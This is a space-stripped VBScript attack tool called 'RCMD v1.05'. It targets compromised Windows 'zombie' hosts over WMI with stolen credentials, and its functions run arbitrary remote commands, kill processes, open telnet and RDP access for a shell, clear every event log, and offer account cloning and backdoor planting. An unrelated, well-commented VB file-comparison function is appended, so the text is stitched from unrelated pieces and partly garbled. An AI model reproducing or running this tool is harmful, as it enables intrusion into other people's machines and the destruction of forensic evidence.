wnlvbcrlf&"DiskInfo:" foreachobj7incol7 withobj7 wnl"DeviceID:"&.deviceid wnl"Caption:"&.caption wnl"InterfaceType:"&.interfacetype wnl"SCSIBus:"&.scsibus wnl"SCSILogicalUnit:"&.scsilogicalunit wnl"SCSIPort:"&.scsiport wnl"SCSITargetId:"&.scsitargetid wnl"SectorsPerTrack:"&.sectorspertrack&"KB" wnl"Partitions:"&.partitions wnl"Size:"&sizeformat(.size) endwith next str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4) str=str+"Size"+space(6)+"Free"+space(12)+"Label" wnlstr foreachobj8incol8 withobj8 drivetype="" selectcase.drivetype case0 drivetype="Unknow" case1 drivetype="NoRootDir" case2 drivetype="Removable" case3 drivetype="Fixed" case4 drivetype="Network" case5 drivetype="CD-ROM" case6 drivetype="RAM" endselect strpercent="" if.size<>""and.freespace<>""then strpercent="("&formatpercent(.freespace/.size,0)&")" endif str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10) str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename wnlstr endwith next wnlvbcrlf&"NICInformaton:" foreachobj9incol9 withobj9 if.IPEnabledthen wnl"Index:"&.index wnl"Description:"&.description wnl"DHCPEnabled:"&.dhcpenabled wnl"DHCPServer:"&.dhcpserver wnl"DNSHostName:"&.dnshostname wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder) wnl"WINSPrimaryServer:"&.winsprimaryserver wnl"IPAddress:"&wfl(.ipaddress) wnl"MACAddress:"&.macaddress wnl"DefaultIPGateway:"&wfl(.defaultipgateway) wnl"IPSubnet:"&wfl(.ipsubnet) wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols) wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports) wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports) endif endwith next wnlvbcrlf&"HotFixesInfo:" foreachobj10incol10 wnl"HotFixID:"&obj10.hotfixid wnl"FixComments:"&obj10.fixcomments wnl"InstallDate:"&obj10.installdate wnl"ServicePackInEffect:"&obj10.servicepackineffect next wnlvbcrlf&"Applications:" setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password) 
setobj11=objswb1.get("stdregprov") HKLM=&h80000002 keypath="SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" obj11.enumkeyHKLM,keypath,keyarray redimstr(ubound(keyarray)+1) j=0 fori=0toubound(keyarray) obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue ifstrvalue<>""then str(j)=strvalue j=j+1 endif next ifj>1then fori=0toj-1 fork=0toj-i-1 ifstrcomp(str(k),str(k+1),1)=1then strtemp=str(k+1) str(k+1)=str(k) str(k)=strtemp endif next next endif fori=0toj-1 wnl""&str(i) next wscript.echo""&vbcrlf wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!" callmain() endfunction subwnl(msg) wscript.echomsg ifisobject(of)then onerrorresumenext of.writelinemsg showerror() onerrorgoto0 endif endsub functionwfl(byrefobj) str="" fori=0toubound(obj) str=str&obj(i)&"" next wfl=str endfunction functionwsp(msg,num) ifmsg<>""then msg=left(msg,num-1) wsp=msg&space(num-len(msg)) else wsp=space(num) endif endfunction functiontimeformat(msg) timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2) endfunction functionsizeformat(msg) ifmsg<>""then size=msg/1048576 ifsize>1024then sizeformat=round(size/1024,2)&"GB" else sizeformat=round(size,1)&"MB" endif endif endfunction functionobjget(msg) setcol=objswbemservices.instancesof(msg) foreachobjxincol setobj=objx next setobjget=obj endfunction '****************************************** functioncommand() wscript.echo"PleseEnterTheCommand:" callrun() endfunction functionrun() strcmdline=WScript.StdIn.Readline() ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then callmain() endif outstreem.write"Runningthecommand...." setobjinstance=objswbemservices.get("win32_process") setobjmethod=objinstance.methods_("create") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.commandline=strcmdline setobjoutparam=objinstance.execmethod_("create",objinparam) ifobjoutparam.returnvalue<>0then wscript.echo"Error!" callcommand() else wscript.echo"OK!" 
endif wscript.echo"TheProcessIDis"&objoutparam.processid wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf callcommand() endfunction '******************************************* functionpslist() outstreem.write"Listingprocess...." setcolinstances=objswbemservices.execquery("select*fromwin32_process") showerror(err.number) wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath" foreachobjinstanceincolinstances iflen(objinstance.name)<8then strname=objinstance.name&chr(9) else strname=objinstance.name endif wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath next wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!" callmain() endfunction '***************************************** functionpskill() wscript.echo"pleseentertheprocess'sid:" strprocess=WScript.StdIn.Readline() outstreem.write"Killingid="&strprocess&"process...." setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'") ifvartype(objinstance)<>vbobjectthen wscript.echovbcrlf&"Specifiedprocessisnotexist." callmain() else setobjmethod=objinstance.methods_("terminate") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.reason=0 setobjoutparam=objinstance.execmethod_("terminate",objinparam) showerror(objoutparam.returnvalue) wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!" endif callmain() endfunction '******************************************************** functiontelnet() outstreem.write"Queryingstateoftelnetserver...." setobjswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password) setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'") showerror(err.number) foreachobjinstanceincolinstances ifobjinstance.startmode="Disabled"then outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...." 
setobjmethod=objinstance.methods_("changestartmode") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.startmode="Manual" setobjoutparam=objinstance.execmethod_("changestartmode",objinparam) showerror(objoutparam.returnvalue) endif outstreem.write"Changeingstate...." ifobjinstance.started=truethen intstatus=objinstance.stopservice() showerror(intstatus) wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully." else showerror(intstatus) wscript.echo"pleseenterthentlm:" ntlm=WScript.StdIn.Readline() wscript.echo"pleseentertheport:" port=WScript.StdIn.Readline() ifnotisnumeric(ntlm)orntlm<0orntlm>2then wscript.echo"ThevalueofNTMLiswrong." callmain() endif ifnotisnumeric(port)then wscript.echo"Thevalueofportiswrong." main() endif setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password) outstreem.write"SettingNTLM="&ntlm&"...." setobjinstance1=objswbemservices1.get("stdregprov") setobjmethod=objinstance1.methods_("SetDWORDvalue") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.hdefkey=&h80000002 objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0" objinparam.svaluename="NTLM" objinparam.uvalue=ntlm setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam) showerror(objoutparam.returnvalue) outstreem.write"Settingport="&port&"...." objinparam.svaluename="TelnetPort" objinparam.uvalue=port setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam) showerror(objoutparam.returnvalue) intstatus=objinstance.startservice() wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!" wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell." endif next callmain() endfunction '******************************************************** functionrs() outstreem.write"CheckingTheOSType...." setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem") foreachobjinstoscaptionincolinstoscaption ifinstr(objinstoscaption.caption,"Server")>0then wscript.echo"OK!" 
else wscript.echo"OK!" wscript.echo"OSTypeis"&objinstoscaption.caption wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60 callmain() endif next wscript.echo"pleseentertheport:" port=WScript.StdIn.Readline() ifnotisnumeric(port)orport<1orport>65000then'50 wscript.echo"Thenumberofportiserror." callmain() endif outstreem.write"Writingintoregistry...." setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov") HKLM=&h80000002 withobjinstreg .createkey,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" .setdwordvalueHKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0'70 .createkeyHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" .setdwordvalueHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer","TSEnabled",1 .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2 .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2 .setstringvalueHKLM,".DEFAULT\KeyboardLayout\Toggle","Hotkey","1" .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp","PortNumber",port endwith showerror(err.number) wscript.echo"Now,youneedtoreboottarget!" wscript.echo"Doyouwanttoreboottargetnow?[y/n]" strcancel=WScript.StdIn.Readline() ifstrcancel="n"then wscript.echo"youneedtoreboottargetthen!!" callmain() else callreboot() endif wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!" callmain() endFunction '************************************************************** functionclog() outstreem.write"Clearingalllogs...." strwqlquery="select*fromWin32_NTEventLogFile" setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20) foreachobjinstanceincolinstances ifobjinstance.cleareventlog()<>0then wscript.echo"Error!"'100 callmain() endif next wscript.echo"OK!" wscript.echo"AlllogshavebeenclearedSuccessfully!" 
callmain() endfunction '*************************************************************** functionshowerror(errornumber) iferrornumberThen wscript.echo"Error0x"&cstr(hex(err.number))&"." iferr.description<>""then wscript.echo"Errordescription:"&err.description&"." endif callmain() else wscript.echo"OK!" endif endfunction '***************************************************************** functionusage() wscript.echostring(79,"*") wscript.echo"RCMDv1.05" wscript.echo"RemoteexecutionScript,by黑嘿黑" wscript.echo"Welcometovisite" wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com" wscript.echo"Usage:" wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword" wscript.echo"Thenchosethecommand>" wscript.echostring(79,"*") endfunction '********************************************************** functionmain() wscript.echo"" wscript.echo"Nowchosethecommand>" wscript.echo"0.quit退出脚本" wscript.echo"1.telnet远程开/关telnet" wscript.echo"2.3389远程开3389" wscript.echo"3.clog远程删除所有日志" wscript.echo"4.getf获取肉鸡系统信息" wscript.echo"5.pslist例出进程" wscript.echo"6.pskill删除进程" wscript.echo"7.command远程执行DOS命令" wscript.echo"8.reboot远程重启肉鸡" wscript.echo"9.slist例出远程肉鸡上的服务信息" wscript.echo"A.Share1.列出共享2.创建共享3.删除共享" wscript.echo"B.ca克隆帐号" wscript.echo"C.Door种植后门" wscript.echostring(79,"*") wscript.echo"CMD>" cmd=WScript.StdIn.Readline() wscript.echo"" SelectCasecmd case"telnet","1" telnet() case"3389","2" rs() case"clog","3" clog() case"getf","4" inf() case"psl","pslist","5" pslist() case"psk","pskill","6" pskill() case"cmd","command","7" command() case"reboot","8" reboot() case"slist","9" listlistsvr() case"share","10","a","A" share() case"B","b","11" ca() case"C","c","12" door() case"quit","0" wscript.quit endselect endfunction 
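' Compare two files byte-for-byte.
'
' F1, F2 : paths of the files to compare; both are opened read-only in
'          binary mode.
' Returns : True when both files have the same length and identical
'           contents, False otherwise.
' Raises  : whatever runtime error Open/Get produced, re-raised to the
'           caller only after the handles this routine opened are closed.
'
' Fixes relative to the earlier version:
'  - the chunk offset advance lost its "+" (start& = start& 10000), so the
'    loop re-read the first chunk forever / failed to compile;
'  - fixed file numbers #1/#2 collide with files the caller may hold, and
'    a bare "Close" closed EVERY open file in the program, not just ours;
'  - an error in Open/Get left handles leaked; now they are always closed;
'  - the comparison is forced to binary so an "Option Compare Text" module
'    cannot turn it into a case-insensitive match.
Function CompFile(F1 As String, F2 As String) As Boolean
    Const CHUNK_SIZE As Long = 10000   ' bytes per Get; bounds memory use

    Dim fn1 As Integer, fn2 As Integer
    Dim opened1 As Boolean, opened2 As Boolean
    Dim buffer1 As String, buffer2 As String
    Dim pos As Long, remaining As Long, thisChunk As Long
    Dim isSame As Boolean

    isSame = False
    opened1 = False
    opened2 = False
    On Error GoTo CleanUp

    ' FreeFile hands out a file number nobody else in the process is using.
    fn1 = FreeFile
    Open F1 For Binary Access Read As #fn1
    opened1 = True
    fn2 = FreeFile
    Open F2 For Binary Access Read As #fn2
    opened2 = True

    If LOF(fn1) <> LOF(fn2) Then
        ' Different sizes can never be identical; skip the read loop.
        isSame = False
    Else
        isSame = True
        pos = 1                     ' Get positions are 1-based
        remaining = LOF(fn1)        ' zero-length files compare equal
        Do While remaining > 0
            ' Last chunk may be shorter than CHUNK_SIZE; size the buffers
            ' to exactly what is left so Get does not read past EOF.
            thisChunk = remaining
            If thisChunk > CHUNK_SIZE Then thisChunk = CHUNK_SIZE
            buffer1 = String$(thisChunk, 0)
            buffer2 = String$(thisChunk, 0)
            Get #fn1, pos, buffer1
            Get #fn2, pos, buffer2
            If StrComp(buffer1, buffer2, vbBinaryCompare) <> 0 Then
                isSame = False
                Exit Do
            End If
            pos = pos + thisChunk
            remaining = remaining - thisChunk
        Loop
    End If

CleanUp:
    ' Close only the handles we opened, then surface any pending error.
    If opened2 Then Close #fn2
    If opened1 Then Close #fn1
    CompFile = isSame
    If Err.Number <> 0 Then Err.Raise Err.Number, Err.Source, Err.Description
End Function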
本脚本还会不断升级,增加新的功能。